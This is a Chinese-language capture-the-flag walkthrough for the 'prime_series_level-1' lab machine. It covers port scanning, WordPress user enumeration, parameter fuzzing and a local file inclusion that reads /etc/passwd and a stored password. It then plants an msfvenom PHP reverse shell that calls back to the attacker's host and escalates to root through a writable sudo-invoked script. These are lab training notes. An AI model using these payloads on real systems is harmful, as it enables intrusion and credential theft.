prime_series_level-1

靶机下载
网络NAT

arp-scan -l
nmap -p 1-65535 -A 192.168.194.157

访问http

dirb http://192.168.194.157

再使用dirb工具加上参数过滤一下
dirb http://192.168.194.157 -X .txt,.php,zip

fuzz
location.txt

page of php ：

• http://192.168.194.157/image.php

• http://192.168.194.157/index.php

wpscan枚举用户

wpscan --url http://192.168.194.157/wordpress/   --enumerate u  

得到用户victor

使用Kali自带的wfuzz

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt  http://192.168.194.157/index.php?FUZZ

过滤

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.194.157/index.php?FUZZ 

试下

http://192.168.194.157/index.php?file=location.txt

正确参数为secrettier360，试了一个前php不行，换一个对了

http://192.168.194.157/image.php?secrettier360=location.txt

运用

http://192.168.194.157/image.php?secrettier360=/etc/passwd

使用 curl 有换行

curl http://192.168.194.157/image.php?secrettier360=/etc/passwd

http://192.168.194.157/image.php?secrettier360=/home/saket/password.txt

follow_the_ippsec

进入后台

http://192.168.194.157/wordpress/wp-login.php
victor
follow_the_ippsec

可以写入的主题编辑区 secret.php
使用msf生成反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.194.156 lport=7777 -o shell.php     
use exploit/multi/handler
set Payload php/meterpreter/reverse_tcp
set LHOST 192.168.194.156
set lport 7777
run

http://192.168.194.157/wordpress/wp-content/themes/twentynineteen/secret.php

提权

交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

参考
/opt/backup/server_database
cat backup_pass

enc.txt

nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=

key.txt

I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.

tribute_to_ippsec

[email protected]:~$ sudo -l
sudo -l
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
[email protected]:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
[email protected]:~$ cp /bin/bash /tmp/challenge
cp /bin/bash /tmp/challenge
[email protected]:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
[email protected]:~# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# 

提权原理，创建challenge文件，将/bin/bash写入文件中，然后重新执行sudo /home/victor/undefeated_victor命令以获取拥有root权限的shell.参考